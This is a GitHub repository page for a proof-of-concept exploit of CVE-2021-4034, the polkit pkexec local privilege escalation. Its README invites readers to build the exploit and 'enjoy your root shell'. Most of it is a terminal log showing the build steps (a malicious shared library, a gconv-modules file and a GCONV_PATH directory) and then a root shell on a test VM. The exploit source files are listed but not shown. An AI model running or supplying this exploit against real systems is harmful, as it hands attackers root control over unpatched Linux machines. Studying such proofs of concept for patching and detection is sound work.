CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

The original advisory by the real authors is here

PoC

If the exploit is working you'll get a root shell immediately:

vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Updating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:

vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
Makefile		Makefile
README.md		README.md
cve-2021-4034.c		cve-2021-4034.c
pwnkit.c		pwnkit.c

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2021-4034

PoC

About

Releases

Packages

Languages

z-elaine/CVE-2021-4034

Folders and files

Latest commit

History

Repository files navigation

CVE-2021-4034

PoC

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages